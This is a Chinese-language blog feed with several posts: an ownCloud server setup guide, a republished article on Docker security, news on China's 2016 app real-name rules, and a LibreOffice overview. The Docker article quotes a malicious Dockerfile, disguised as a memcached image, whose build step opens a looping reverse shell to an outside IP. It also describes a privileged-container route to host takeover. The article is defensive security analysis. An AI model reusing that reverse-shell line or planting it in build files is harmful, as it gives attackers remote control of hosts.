The post 0元打造 企業私有網路硬碟 first appeared on 捕夢網 Blog.
]]>今天跟大家分享如何建置企業內部私有的網路硬碟,最近要幫公司同事建立一個更方便的網路硬碟,找了一堆網路文章,想要好用又便宜,後來被我找到了這套 OwnCloud ,為什麼是他因為它可以支援幾個我需要的功能:
1.共用資料夾
公司內部有好幾個部門,每個部門都需要自己部門的公用資料夾,還有特殊的群組,如部門主管共用資料夾,還有那種誰誰誰要共用,誰誰誰只能讀不能寫,OwnCloud對於權限的控管,相當的不錯.
2.多種裝置 (Multi Device)電腦(跨平台 windows 、Mac 、 Linux) 平板跟手機(IOS 、Android)
3.所有的裝置檔案同步 手機跟電腦或者是你家裡的電腦,你新增刪除修改都是同步的,你辦公室電腦把檔案刪除了,回到家裡,你家裡電腦的檔案,同步後,也會被刪除
因為這三個需求,我決定使用 OwnClouc 來建置公司的網路硬碟,廢話不多說,馬上開始
安裝需求:
1.需要主機一台 (實體主機 ,雲端主機皆可)
2.需要有一個實體的 IP 跟上網的頻寬
3.作業系統版本 CentOS7
安裝主機:
首先開啟一台雲端主機,接著使用快速安裝,安裝CentOS 7 的版本
1.登入捕夢網雲端主機平台
2.使用快速安裝,安裝CentOS 7
ownCloud 在執行前需要安裝的套件如下:
1.執行指令安裝,我們將使用MariaDB 連結OwnCloud 的mysql database
yum install mariadb-server mariadb
2.啟用 mariadb
systemctl start mariadb
3.設定開機啟動 mariadb
systemctl enable mariadb
4.設定 資料庫安全性
mysql_secure_installation
NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MySQL SERVERS IN PRODUCTION USE! PLEASE READ EACH STEP CAREFULLY! In order to log into MySQL to secure it, we'll need the current password for the root user. If you've just installed MySQL, and you haven't set the root password yet, the password will be blank, so you should just press enter here. # 輸入 root 的密碼,如果沒有設定過,直接按 Enter 鍵即可 Enter current password for root (enter for none): OK, successfully used password, moving on... Setting the root password ensures that nobody can log into the MySQL root user without the proper authorisation. # 設定 root 的密碼 Set root password? [Y/n] y New password: Re-enter new password: Password updated successfully! Reloading privilege tables.. ... Success! By default, a MySQL installation has an anonymous user, allowing anyone to log into MySQL without having to have a user account created for them. This is intended only for testing, and to make the installation go a bit smoother. You should remove them before moving into a production environment. # 移除 anonymous 使用者 Remove anonymous users? [Y/n] y ... Success! Normally, root should only be allowed to connect from 'localhost'. This ensures that someone cannot guess at the root password from the network. # 取消 root 遠端登入 Disallow root login remotely? [Y/n] y ... Success! By default, MySQL comes with a database named 'test' that anyone can access. This is also intended only for testing, and should be removed before moving into a production environment. # 移除 test 資料表 Remove test database and access to it? [Y/n] y - Dropping test database... ... Success! - Removing privileges on test database... ... Success! Reloading the privilege tables will ensure that all changes made so far will take effect immediately. # 重新載入資料表權限 Reload privilege tables now? [Y/n] y ... Success! Cleaning up... All done! If you've completed all of the above steps, your MySQL installation should now be secure. Thanks for using MySQL!
1.執行指令安裝 Apache 2.4
yum install httpd
2.啟動Apache 服務
systemctl start httpd
3.設定開機啟動 Apache
systemctl enable httpd
測試 Apache 是否安裝成功,開啟瀏覽器 http://你安裝的主機IP/
如果成功的話,畫面如下:
1.首先安裝 SCL 套件
yum install centos-release-scl
2.安裝 PHP相關模組
yum install php55 php55-php php55-php-gd php55-php-mbstring php55-php-mysqlnd
Copy the PHP 5.5 Apache modules into place:
3.複製 PHP 5.5 Apache 模組 設定檔:
cp /opt/rh/httpd24/root/etc/httpd/conf.d/php55-php.conf /etc/httpd/conf.d/ cp /opt/rh/httpd24/root/etc/httpd/conf.modules.d/10-php55-php.conf /etc/httpd/conf.modules.d/ cp /opt/rh/httpd24/root/etc/httpd/modules/libphp55-php5.so /etc/httpd/modules/
4.重新啟動 Apache
systemctl restart httpd
Verify with phpinfo that your Apache server is using PHP 5.5 and loading the correct modules. Create a new file in the httpd directory:
透過 phpinfo 來確認PHP5.5 模組是否載入正常,新增info.php 檔案:
vi /var/www/html/info.php
<?php phpinfo(); ?>
瀏覽下面網址 http://你的主機IP/info.php ,畫面如下:
yum install mod_ssl openssl
我們將會利用 OpenSSL 來產生一張自我簽署的憑證。如果你在一台生產用的伺服器上做這個動作,你應該會想從一個被信賴的憑證機構取得一條金鑰,但假若你只是用在一個私人網站上或作測試之用,自我簽署的憑證已經足夠了。要建立金鑰,你必須是 root 用戶
# 產生私鑰 openssl genrsa -out ca.key 2048 # 產生 CSR openssl req -new -key ca.key -out ca.csr # 產生自我簽署的金鑰 openssl x509 -req -days 365 -in ca.csr -signkey ca.key -out ca.crt # 複製檔案至正確位置 cp ca.crt /etc/pki/tls/certs cp ca.key /etc/pki/tls/private/ca.key cp ca.csr /etc/pki/tls/private/ca.csr
警告:如果你採用 SELinux,請確保你複製這些檔案而不是遷移它們。否則 Apache 將會投訴關於違漏了的憑證檔,因為它無法讀取這些擁有錯誤 SELinux 脈絡的憑證檔。
restorecon -RvF /etc/pki
vi /etc/httpd/conf.d/ssl.conf
原來是 SSLCertificateFile /etc/pki/tls/certs/local.crt 請修改為 SSLCertificateFile /etc/pki/tls/certs/ca.crt
然後在再低數行的位置為憑證金鑰檔案設定正確路徑。如果你按照上面的指引,這會是:
原來是 SSLCertificateKeyFile /etc/pki/tls/private/local.key 請修改為 SSLCertificateKeyFile /etc/pki/tls/private/ca.key
/etc/init.d/httpd restart
一如你為 http 在連接埠 80 上設立 VirtualHost,你亦可為 https 在連接埠 443 上作樣似的設置。一個在連接埠 80 上的網站的典型 VirtualHost 有如下樣子
vi /etc/httpd/conf/httpd.conf
到檔案最下方增加下面內容:
<VirtualHost *:80> <Directory /var/www/html/你的網址/httpdocs> AllowOverride All </Directory> DocumentRoot /var/www/html/你的網址/httpdocs ServerName 你的網址 </VirtualHost>
為了網站安全,設定網站加密port 443,你需要在你的檔案頂部加入下列內容
NameVirtualHost *:443
然後再加入一個類似如下的 VirtualHost 記錄:
<VirtualHost *:443> SSLEngine on SSLCertificateFile /etc/pki/tls/certs/ca.crt SSLCertificateKeyFile /etc/pki/tls/private/ca.key <Directory /var/www/vhosts/yoursite.com/httpsdocs> AllowOverride All </Directory> DocumentRoot /var/www/html/你的網址/httpsdocs ServerName yoursite.com </VirtualHost>
1.執行下列指令進行安裝
rpm --import https://download.owncloud.org/download/repositories/9.0/CentOS_7/repodata/repomd.xml.key
2.下載 yum 安裝檔
wget http://download.owncloud.org/download/repositories/9.0/CentOS_7/ce:9.0.repo -O /etc/yum.repos.d/ce:9.0.repo
3.清除快取,確保你安裝的是最新版本的 OwnCloud
yum clean expire-cache
4.安裝 OwnCloud 套件
yum install owncloud-files
安裝完成後,開啟瀏覽器 http://你的IP或 你的網址/owncloud ,畫面如下
1.新增一隻執行檔案,這樣可以快速修改檔案權限
vi /tmp/dirperm.sh
2.貼上下面的內容:
#!/bin/bash ocpath='/var/www/html/owncloud' htuser='apache' htgroup='apache' rootuser='root' printf "Creating possible missing Directories\n" mkdir -p $ocpath/data mkdir -p $ocpath/assets mkdir -p $ocpath/updater printf "chmod Files and Directories\n" find ${ocpath}/ -type f -print0 | xargs -0 chmod 0640 find ${ocpath}/ -type d -print0 | xargs -0 chmod 0750 printf "chown Directories\n" chown -R ${rootuser}:${htgroup} ${ocpath}/ chown -R ${htuser}:${htgroup} ${ocpath}/apps/ chown -R ${htuser}:${htgroup} ${ocpath}/assets/ chown -R ${htuser}:${htgroup} ${ocpath}/config/ chown -R ${htuser}:${htgroup} ${ocpath}/data/ chown -R ${htuser}:${htgroup} ${ocpath}/themes/ chown -R ${htuser}:${htgroup} ${ocpath}/updater/ chmod +x ${ocpath}/occ printf "chmod/chown .htaccess\n" if [ -f ${ocpath}/.htaccess ] then chmod 0644 ${ocpath}/.htaccess chown ${rootuser}:${htgroup} ${ocpath}/.htaccess fi if [ -f ${ocpath}/data/.htaccess ] then chmod 0644 ${ocpath}/data/.htaccess chown ${rootuser}:${htgroup} ${ocpath}/data/.htaccess fi
3.修改檔案權限,讓檔案擁有執行的權限
chmod 755 /tmp/dirperm.sh
4.執行 dirperm.sh 檔案
/tmp/dirperm.sh 畫面會顯示修正完成 ,畫面如下: Creating possible missing Directories chmod Files and Directories chown Directories chmod/chown .htaccess
重新整理網頁,你會看到畫面如下:
如果很多人使用的話,為了讓效能更好,可以使用資料庫mysql
1.進入系統執行下列指令,新增資料庫:
mysql -u root -p Enter password: CREATE DATABASE owncloudDB; GRANT ALL ON owncloudDB.* to 'ownclouduser'@'localhost' IDENTIFIED BY 'ENTER_PASSWORD'; FLUSH PRIVILEGES; quit
選擇Mysql/MariaDB 與檔案儲存位置 還有新增管理者帳號:
設定完畢後,就可以登入囉,看到這個畫面,雲端的部分就算是完成了
建立使用者後,就可以開始用囉
安裝PC端軟體
網址: https://owncloud.org/install/
我覺得有點小小的遺憾,手機需要30元才能安裝,但是這麼完整的功能,30元好像還可以接受.
The post 0元打造 企業私有網路硬碟 first appeared on 捕夢網 Blog.
]]>The post Docker安全那些事 first appeared on 捕夢網 Blog.
]]>在過去的一年,容器正在以驚人的速度發展,國內也有大量互聯網公司在生產環境中使用Docker,其中也不乏萬台規模的。前些日子烏雲曝出Swarm配置問題造成的安全隱患,也讓大家對Docker安全提起了關注,本文主要從“Docker自身安全”,“DockerImages安全”和“Docker使用安全隱患”來聊一聊Docker安全那些事。
0x01 Docker自身安全
歸總結了下CVE中關於Docker的漏洞報告,結果如下:
序號 |
CVE編號 |
漏洞版本 |
漏洞名稱 |
---|---|---|---|
1 |
CVE-2015-3630 |
1.6.0 |
Docker Libcontainer 安全繞過漏洞 |
2 |
CVE-2015-3627 |
1.6.1 |
Libcontainer和Docker Engine 許可權許可和存取控制漏洞 |
3 |
CVE-2015-3630 |
1.6.1 |
Docker Engine 安全繞過漏洞 |
4 |
CVE-2014-9358 |
1.3.3 |
Docker 目錄遍歷漏洞 |
5 |
CVE-2014-9357 |
1.3.2 |
Docker 許可權許可和存取控制漏洞 |
6 |
CVE-2014-6408 |
1.3.1 |
Docker 許可權許可和存取控制漏洞 |
7 |
CVE-2014-5277 |
1.3.0 |
Docker和docker-py 代碼注入漏洞 |
全部漏洞:https://docs.docker.com/engine/security/non-events/
可以發現Docker存在問題的版本分別在1.3和1.6,因為許可權控制等問題導致可以脫離容器拿到宿主機許可權。Docker在6月發佈了最新版本1.12版本,從1.6到如今的1.12都未爆出漏洞的情況(排除Oday可能)。基於Docker本身來講安全行可以保障的,無論是容器的隔離還是資源限制容器都有著很出色的表現,更多的安全隱患發生在使用者上,因為沒有正確的使用容器或者配置出錯導致了容器的危險運行。
0x02 DockerImages安全
容器的環境是基於容器鏡像,一旦容器鏡像存在風險那麼容器的安全性也要大打折扣了。我們在看容器鏡像又是根據Dockerfile一層層疊加的,如下圖:
底層Base鏡像引用“atiger77:1.0”,第二層鏡像在此之上添加run.sh腳本到容器目錄中,第三層鏡像是指在容器運行時執行run.sh腳本。Docker鏡像有自己的緩存機制,構建時會逐層往上進行檢查,底層鏡像如果沒有產生變動,則跳過構建使用鏡像Cache來節省構建時間,如果檢測到變動則開始進行構建動作。
這裡主要分兩種情況來討論容器鏡像的安全。
1.SoftwareVulnerability
還是根據剛才的鏡像分層來說,底層Base鏡像中如果使用的軟體存在高危漏洞,那麼所有使用Base鏡像所構建出的鏡像都會存在問題。我們來舉個栗子:
上圖中Base鏡像只安裝基礎依賴組件,其中套裝軟體abc有高危漏洞。根據Base鏡像打出需要的鏡像,左邊的鏡像是添加了代碼目錄到容器中,右邊則構建了一個編譯gcc的基礎鏡像。那麼當Base鏡像中的abc軟體存在高危漏洞,那麼所有相關依賴的鏡像就都存在了風險。當出現這種情況時,需要先修復Base鏡像中的問題軟體,完成後一次對依賴的鏡像重新進行構建動作。
根據上述情況,我分別從dockerhub和github中下載了部分鏡像進行真實測試,
測試漏洞:Bash漏洞,測試代碼:https://github.com/hannob/bashcheck/blob/master/bashcheck
測試版本:
分別使用官方鏡像進行測試,版本為centos5.11/6.6/7.2
測試過程:
Version:5.11
Version:6.6
Version:7.2
測試結果:
從測試結果可以看到官網下載的centos5.11和centos6.6都存在BASH漏洞(CVE-2014-6277)。查看了下CVE記錄時間為2014年9月9日,官方給出的centos6.6上次更新時間是2015年的5月4日然後並沒有修復該漏洞。
CVE報告時間:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277
Docker-Centos6.6官方dockerfile地址:https://github.com/CentOS/sig-cloud-instance-images/blob/8911843d9a6cc71aadd81e491f94618aded94f30/docker/Dockerfile
雖然Base鏡像已然存在這個漏洞,但是容器用來跑服務的,一般情況下是不需要進入容器進行操作的,這裡我演示的只是一個通用漏洞,當然還會存在其他服務的漏洞容器鏡像,這裡還是給出自己的建議,公司使用容器基礎鏡像需要自己構建,保證Base鏡像的乾淨和安全,現在也有很多小夥伴開始使用alpine的鏡像,一個centos也就幾十M搞定了。
其實到這邊容器安全都是在可控範圍內的,即使使用的服務或者應用有問題使得攻擊者上傳了webshell,操作的範圍也只是在容器內並不會對宿主機產生影響,那麼容器就真的安全了嘛?也不儘然,下面我會講如何通過容器拿到宿主機許可權。
2.BadImages
BadImages不是值“壞掉的鏡像”而是說那些“惡意鏡像”,翻了下烏雲所有帶“Docker”和“容器”關鍵字的漏洞,大部分提交的漏洞都是通過Swarm沒有配置正確,從而通過遠端API實現了未授權訪問,相關的解法可以參考“駭客,絕對是駭客”之前寫的文章(http://drops.wooyun.org/papers/15892)。在所有Docker的容器中發現一個比較有意思的,利用自己編寫的dockerfile執行反彈shell拿到了某公有雲一台機器,讓我們看下章總的dockerfile
1 2 3 4 5 6 7 8 9 10 11 12 13 |
FROM ubuntu MAINTAINER Victor Coisne victor.coisne@dotcloud.com RUN sleep 1 RUN cat /etc/passwd RUN echo "deb http://mirrors.163.com/ubuntu/ precise main restricted universe multiverse" > /etc/apt/sources.list RUN apt-get update RUN echo "while ((1));do sleep 1;echo 111;/bin/sh -i >& /dev/tcp/1.1.1.1/1234 0>&1;done" >> /tmp/1.sh RUN bash /tmp/1.sh RUN sleep 20 RUN apt-get install -y memcached ENTRYPOINT [“memcached”] USER daemon EXPOSE 11211 |
第一眼看是啟動memcached的一個dockerfile,仔細一看發現其中別有洞天,在構建過程中存在了一個反彈shell,由於該廠商自有服務的api沒有和使用者環境隔離做很好的隔離導致反彈shell成功。
我們來分析一下這種情況帶來的危害,網上很多的說法都是不要使用非官方的鏡像,其實也不儘然官方鏡像也不是完全沒有問題這一點之前也分析過了,在我看來非官方的鏡像不是不能用,只是有些鏡像作者沒有寫任何的介紹或者使用方法,dockerfile也不上傳這類鏡像還是不建議使用了,有介紹的鏡像還是花點時間看下dockerfile的寫法到底安裝和執行了哪些內容。當然容器相比傳統的宿主機而言安全性是更好的,這也要歸功於容器的快速反覆運算,使用容器可以加快整個開發交付流程,即使容器被掛了webshell幾天後版本更新會上就會啟動一個新的容器,之前的容器也不復存在了。
0x03 Docker使用安全隱患
Docker本身的安全性是值得信賴的,更多的還是人為使用的錯誤導致了安全隱患,大家印象裡都對Swarm沒有正確配置導致的安全問題比較瞭解,使用Swarm的同學可以參考下阿裡容器服務的玩法,Swarm配置了tls,使用者連接自己Swarm的時候,需要下載證書,使用證書才能和swarm建立tls連接。這裡我會講另一個docker使用場景中會出現的安全隱患以及一些使用docker的注意事項。
Docker的出現加快了整個開發-測試-上線流程,其中我們會使用Jenkins來做持續化集成的工作,簡化流程大致如下(這裡只介紹大概流程讓大家有個印象,省去詳細的流程):
1.開發本地編寫代碼,開發環境通過 –> 2.測試環境進行UT等其他測試,測試環境通過 –> 3.發佈線上環境
當容器用在生產環境中,那麼作為Jenkins而言就起到了CICD的作用,通過Jenkins-Master接受任務分配給對應Slave執行,通過後並將代碼打包到鏡像中發送上線。
讓我們看一下大致的Compose檔長什麼樣:
compose運行在jenkins中設置完畢,主就可以把任務分配給從,並且由從進行測試構建編譯打包成容器等動作。為了讓jenkins-slave能在編譯完成後在宿主機中打鏡像而不是在容器內部,在compose中從掛卷將宿主機的/var/run/docker.sock掛到了容中,並且賦予了"privileged"許可權,這個寫法其實並沒有什麼問題,為了讓從能構建鏡像所以賦予root許可權,恰恰是這樣一旦jenkins被攻破那麼就會對宿主機的安全造成了威脅,這裡拿測試環境給大家演示一下。
環境:假設現在有一台Jenkins,攻擊者通過爆破破解,弱密碼嘗試甚至沒有密碼的情況進入了Jenkins管理頁面。
攻擊思路:由於jenkins-slave有著root許可權,我們需要拿到jenkins-slave許可權然後進行提權操作,從而獲取宿主機許可權。
攻擊過程:
注:預設使用者是jenkins,執行時需要加上sudo否則提示許可權不足。這裡可以看到擁有了privileged許可權的slave容器獲得了宿主機的許可權。
注釋:本人是測試環境就寫了內網IP。
加固方法:
Docker搭配Jenkins使用為了加快交付流程必然會出現許可權問題,這裡提供一種解法儘量避免危害,首先jenkins不要放在公網上,登錄介面可以使用JIRA外掛程式,在JIRA中設置密碼複雜度。
其他想說的:
這裡還想提一下容器創建時一定要加上最大資源使用上限,容器在宿主機中就是個進程,一旦出現記憶體洩露或者Forkbomb類似的事件,宿主機的資源會消耗殆盡導致主機上的所有主機都不可用,建議在服務上線前先預估使用量。
Docker在操作者正確使用的情況下,安全性是可以得到保障的,就拿Jenkins的例子來說雖然開了privilege,要拿到宿主機的許可權還是會碰到許許多多的問題,最後提權用了4天,嘗試了37次構建,各種能想到的辦法都用了,很多辦法只能拿到容器層始終沒辦法提權到主機。
文章來源:http://drops.wooyun.org/tips/17416
圖片來源:https://pixabay.com/
The post Docker安全那些事 first appeared on 捕夢網 Blog.
]]>The post 2016/8/1起伺服器在中國大陸的 APP 需實名制登記與記錄該使用者日誌並保存 60 天備查! first appeared on 捕夢網 Blog.
]]>此一規定等同要求APP開發人員必須落實資訊安全的管理責任,包括針對註冊用戶進行真實的身份認證,同時記錄用戶的使用行為並保存60天。另也要求程式市集(中國將其稱為App超市)核對開發人員的身份並建立信用管理制度。
另一方面,新規定強化了對使用者的保障,要求開發人員在用戶同意下才能蒐集使用者資訊,必須闡明所蒐集資訊的目的與用途,不得開啟與服務無關的功能或捆綁安裝無關的應用程式。
雖然部份美國媒體認為該規定只是中國進一步落實網路實名制,以監控行動程式用戶及開發人員的另一個手段。
但""中國評論家""指出,這項規定不但明確禁止開發人員打造含有違法訊息或惡意功能的程式,也詳列了對使用者隱私權的保障。
相關查證資料:
中國互聯網信息辦公室(網信辦)《移動互聯網應用程序信息服務管理規定》
http://www.cac.gov.cn/2016-06/28/c_1119123114.htm
中國行動程式管理規定8月上路,大力整頓中國App生態
http://www.ithome.com.tw/news/106766
中國網信辦:手機應用程序需真實身份認證
http://www.bbc.com/…/2016/06/160628_cac_mobile_app_new_rules
中國網訊辦發新例,安裝任何大陸 Apps 後使用者如同全裸!
http://qooah.com/2016/06/29/china-apps-develop-rules/
文章來源:https://www.facebook.com/netwargame/photos/a.178682542180604.36168.172306986151493/1034723649909818/?type=3&theater
圖片來源:https://pixabay.com
The post 2016/8/1起伺服器在中國大陸的 APP 需實名制登記與記錄該使用者日誌並保存 60 天備查! first appeared on 捕夢網 Blog.
]]>The post 中國網訊辦發新例,安裝任何大陸 Apps 後使用者如同全裸! first appeared on 捕夢網 Blog.
]]>原因是來目中國國家互聯網信息辦公室今日發佈全新的《移動互聯網應用程序信息服務管理規定》,在有關的規定中,程式開發商需履行六項義務,如下:
這些規定將於 8 月 1 日正式執行。
有關規定美其名是加強手機應用程式的管理、保障用戶在安裝或使用程式時的知情權和選擇權,及尊重和保護知識產權,對一類流氓應用的管制絕對是好事。但是有安裝 Apps 的朋友都會留意到不少 Apps 都會要求收集用戶個人資料才能使用,而最大問題是可保存個人用戶過去六十日的日誌信息紀錄。即是說,在這六十日裡,用戶所有使用 Apps 的動作都會被完整地記錄下來。如是一些聊天、網購、電郵等應用的話,用戶所輸入及處理等動作或也會被記錄。若然這些敏感資料被有心人所獲得,影響效果將非常深遠。
開發商可保存用戶紀錄已經有問題,但是如果有一日內地政府有需要向 Apps 開發商索取個人資料的時候,她們能夠跟 Apple 一樣以保護私隱的名義不提供嗎?
所以在在安裝 Apps 時,尤其是內地開發商的推出出的話,大家要看清楚權限才決定是否安裝。
文章來源:http://qooah.com/2016/06/29/china-apps-develop-rules/
圖片來源:https://pixabay.com
The post 中國網訊辦發新例,安裝任何大陸 Apps 後使用者如同全裸! first appeared on 捕夢網 Blog.
]]>The post 好用又強大的Office 文書編輯軟體- LibreOffice first appeared on 捕夢網 Blog.
]]>
LibreOffice 原自Openoffice.org 開源軟體,裡面提供了類似 Microsoft Office 的 Word、Excel、PowerPoint、小畫家等等的編輯工具,使用者可以免費下載,任意安裝於任何平台,且不需要付高額的授權費。
LibreOffice 功能與外觀大致上還是延續 OpenOffice,功能包含文書編輯(Writer)、試算表(Calc)、簡報(Impress)、繪圖(Draw)、資料庫管理(Base)等等,使用方式跟微軟的文書處理工具一樣,可以支援DOC、DOCX、XLS、XLSX、PPT等等。
LiberOffice Writer (左)與 MS word(右) 外觀:
LiberOffice Calc(左) 與 MS Excel(右) 外觀:
LiberOffice Impress (左)與 MS PowerPoint (右) 外觀:
LiberOffice Draw (左)與 MS 小畫家(右) 外觀:
LibreOffice 提供了包含繁體中文、簡體中文、英文、日文、韓文數十國語言的使用者介面,可以跨平台支援不同的作業系統,如Windows 、Mac OSX、Linux 等等常見的作業系統。
不想花錢又像要好用的文書管理系統趕快下載:
軟體名稱:LibreOffice
軟體版本:5.1.3
軟體語言:繁體中文、簡體中文、英文…等多國語言
軟體性質:免費軟體,個人、家庭或公司皆可免費使用
檔案大小:211 MB
系統支援:Windows、Mac OS X 與 Linux 等系統
官方網站:http://www.libreoffice.org/
若想取得 LibreOffice 的商業支援,請查看我們認證過的合作廠商列表。
LibreOffice 新鮮版是帶有嶄新功能的穩定版本。希望使用最新功能的使用者,請使用此版本。
LibreOffice_5.1.3_Win_x86_sdk.msi
28 MB (Torrent, 資訊)
libreoffice-5.1.3.2.tar.xz
168 MB (Torrent, 資訊)
libreoffice-help-5.1.3.2.tar.xz
1.8 MB (Torrent, 資訊)
libreoffice-translations-5.1.3.2.tar.xz
126 MB (Torrent, 資訊)
LibreOffice 5.1 可用於下列作業系統與架構:
可用的版本
LibreOffice 有下列 已發行 版本:
下載LibreOffice_5.1.3_Win_x86_sdk.msi 後,在 Windows 10的安裝畫面:
點擊安裝:
選擇一般安裝:
進行開始安裝:
安裝中..
安裝中..
安裝完成:
安裝完成,在windows 10的開始列表:
The post 好用又強大的Office 文書編輯軟體- LibreOffice first appeared on 捕夢網 Blog.
]]>